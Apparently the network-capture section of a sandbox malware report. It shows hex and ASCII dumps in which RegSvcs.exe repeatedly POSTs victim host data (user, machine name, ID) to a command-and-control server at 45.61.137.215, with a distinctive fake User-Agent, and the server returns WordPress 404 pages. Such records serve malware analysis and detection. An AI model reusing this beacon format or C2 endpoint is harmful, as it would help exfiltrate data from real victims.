                                            Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
                                            May 29, 2024 15:43:17.207014084 CEST1236INData Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29
                                            Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-siz
                                            May 29, 2024 15:43:17.207027912 CEST448INData Raw: 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 74 65 6d
                                            Data Ascii: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important
                                            May 29, 2024 15:43:17.207062960 CEST1236INData Raw: 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72
                                            Data Ascii: -color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{colo
                                            May 29, 2024 15:43:17.207106113 CEST1236INData Raw: 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75
                                            Data Ascii: minous-vivid-orange-background-color{background-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-background-color{background-color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-lig


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            25192.168.2.94974045.61.137.215807532C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                            TimestampBytes transferredDirectionData
                                            May 29, 2024 15:43:17.361906052 CEST246OUTPOST /index.php/3b1tenbkyj HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: 45.61.137.215
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: DCC85916
                                            Content-Length: 145
                                            Connection: close
                                            May 29, 2024 15:43:17.366785049 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                            Data Ascii: (ckav.rutina528110TINA-PC0FDD42EE188E931437F4FBE2C
                                            May 29, 2024 15:43:19.837291002 CEST1236INHTTP/1.0 404 Not Found
                                            Date: Wed, 29 May 2024 13:43:17 GMT
                                            Server: Apache/2.4.52 (Ubuntu)
                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                            Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/"
                                            Connection: close
                                            Content-Type: text/html; charset=UTF-8
                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED]
                                            Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found &#8211; separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
                                            May 29, 2024 15:43:19.837321043 CEST224INData Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22
                                            Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessio
                                            May 29, 2024 15:43:19.837331057 CEST1236INData Raw: 6e 53 74 6f 72 61 67 65 2e 73 65 74 49 74 65 6d 28 6f 2c 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 74 29 29 7d 63 61 74 63 68 28 65 29 7b 7d 7d 66 75 6e 63 74 69 6f 6e 20 70 28 65 2c 74 2c 6e 29 7b 65 2e 63 6c 65 61 72 52 65 63 74 28 30 2c 30
                                            Data Ascii: nStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data),r=(e.clearRect(0,0,e.canvas.wid
                                            May 29, 2024 15:43:19.837357044 CEST1236INData Raw: 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 74 29 7d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 50 72 6f 6d 69 73 65 26 26 28 6f
                                            Data Ascii: "script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i.addEventListener("DOMContentLoaded",
                                            May 29, 2024 15:43:19.837368011 CEST1236INData Raw: 65 70 74 46 6c 61 67 26 26 21 6e 2e 73 75 70 70 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d
                                            Data Ascii: eptFlag&&!n.supports.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&
                                            May 29, 2024 15:43:19.837384939 CEST672INData Raw: 69 64 3d 27 67 6c 6f 62 61 6c 2d 73 74 79 6c 65 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0a 62 6f 64 79 7b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 62 6c 61 63 6b 3a 20 23 30
                                            Data Ascii: id='global-styles-inline-css' type='text/css'>body{--wp--preset--color--black: #000000;--wp--preset--color--cyan-bluish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red:
                                            May 29, 2024 15:43:19.837397099 CEST1236INData Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64
                                            Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
                                            May 29, 2024 15:43:19.837407112 CEST1236INData Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29
                                            Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-siz
                                            May 29, 2024 15:43:19.837419033 CEST448INData Raw: 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 74 65 6d
                                            Data Ascii: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important
                                            May 29, 2024 15:43:19.837430954 CEST1236INData Raw: 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72
                                            Data Ascii: -color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{colo


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            26192.168.2.94974145.61.137.215807532C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                            TimestampBytes transferredDirectionData
                                            May 29, 2024 15:43:20.008059025 CEST246OUTPOST /index.php/3b1tenbkyj HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: 45.61.137.215
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: DCC85916
                                            Content-Length: 145
                                            Connection: close
                                            May 29, 2024 15:43:20.013079882 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                            Data Ascii: (ckav.rutina528110TINA-PC0FDD42EE188E931437F4FBE2C
                                            May 29, 2024 15:43:22.595927954 CEST1236INHTTP/1.0 404 Not Found
                                            Date: Wed, 29 May 2024 13:43:20 GMT
                                            Server: Apache/2.4.52 (Ubuntu)
                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                            Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/"
                                            Connection: close
                                            Content-Type: text/html; charset=UTF-8
                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED]
                                            Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found &#8211; separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
                                            May 29, 2024 15:43:22.595988035 CEST1236INData Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22
                                            Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
                                            May 29, 2024 15:43:22.596023083 CEST1236INData Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c
                                            Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
                                            May 29, 2024 15:43:22.596054077 CEST1236INData Raw: 75 70 70 6f 72 74 73 5b 74 5d 3d 65 5b 74 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 2c 22 66 6c 61 67 22 21
                                            Data Ascii: upports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.support
                                            May 29, 2024 15:43:22.596159935 CEST1236INData Raw: 72 3a 23 33 32 33 37 33 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 39 39 39 39 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 63 61 6c 63 28 2e
                                            Data Ascii: r:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}</style><style id='global-styles-i
                                            May 29, 2024 15:43:22.596218109 CEST1236INData Raw: 6e 67 65 2d 74 6f 2d 76 69 76 69 64 2d 72 65 64 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 61 28 32 35 35 2c 31 30 35 2c 30 2c 31 29 20 30 25 2c 72 67 62 28 32 30 37 2c 34 36 2c 34 36 29 20 31 30 30 25 29
                                            Data Ascii: nge-to-vivid-red: linear-gradient(135deg,rgba(255,105,0,1) 0%,rgb(207,46,46) 100%);--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray: linear-gradient(135deg,rgb(238,238,238) 0%,rgb(169,184,195) 100%);--wp--preset--gradient--cool-to-w
                                            May 29, 2024 15:43:22.596272945 CEST776INData Raw: 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d 2d 32 30 3a 20 30 2e 34 34 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d 2d 33 30 3a 20 30 2e 36 37 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61
                                            Data Ascii: -preset--spacing--20: 0.44rem;--wp--preset--spacing--30: 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5rem;--wp--preset--spacing--60: 2.25rem;--wp--preset--spacing--70: 3.38rem;--wp--preset--spacing--80: 5.06rem;--wp--p
                                            May 29, 2024 15:43:22.596337080 CEST1236INData Raw: 30 3b 7d 62 6f 64 79 20 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 7b 64 69 73 70 6c 61 79 3a 20 67 72 69 64 3b 7d 62 6f 64 79 20 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 20 3e 20 2a 7b 6d 61 72 67 69 6e 3a 20 30 3b 7d 3a 77 68 65 72 65 28
                                            Data Ascii: 0;}body .is-layout-grid{display: grid;}body .is-layout-grid > *{margin: 0;}:where(.wp-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where
                                            May 29, 2024 15:43:22.596370935 CEST1236INData Raw: 64 2d 70 75 72 70 6c 65 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 70 75 72 70 6c 65 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 62 6c 61 63
                                            Data Ascii: d-purple-color{color: var(--wp--preset--color--vivid-purple) !important;}.has-black-background-color{background-color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-background-color{background-color: var(--wp--preset--color
                                            May 29, 2024 15:43:22.596446991 CEST1016INData Raw: 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 70 75 72 70 6c 65 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f
                                            Data Ascii: portant;}.has-vivid-purple-background-color{background-color: var(--wp--preset--color--vivid-purple) !important;}.has-black-border-color{border-color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-border-color{border-color:


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            27192.168.2.94974245.61.137.215807532C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                            TimestampBytes transferredDirectionData
                                            May 29, 2024 15:43:22.752548933 CEST246OUTPOST /index.php/3b1tenbkyj HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: 45.61.137.215
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: DCC85916
                                            Content-Length: 145
                                            Connection: close
                                            May 29, 2024 15:43:22.757580996 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                            Data Ascii: (ckav.rutina528110TINA-PC0FDD42EE188E931437F4FBE2C
                                            May 29, 2024 15:43:25.290366888 CEST1236INHTTP/1.0 404 Not Found
                                            Date: Wed, 29 May 2024 13:43:23 GMT
                                            Server: Apache/2.4.52 (Ubuntu)
                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                            Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/"
                                            Connection: close
                                            Content-Type: text/html; charset=UTF-8
                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED]
                                            Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found &#8211; separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
                                            May 29, 2024 15:43:25.290412903 CEST1236INData Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22
                                            Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
                                            May 29, 2024 15:43:25.290431023 CEST1236INData Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c
                                            Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
                                            May 29, 2024 15:43:25.290441990 CEST1236INData Raw: 75 70 70 6f 72 74 73 5b 74 5d 3d 65 5b 74 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 2c 22 66 6c 61 67 22 21
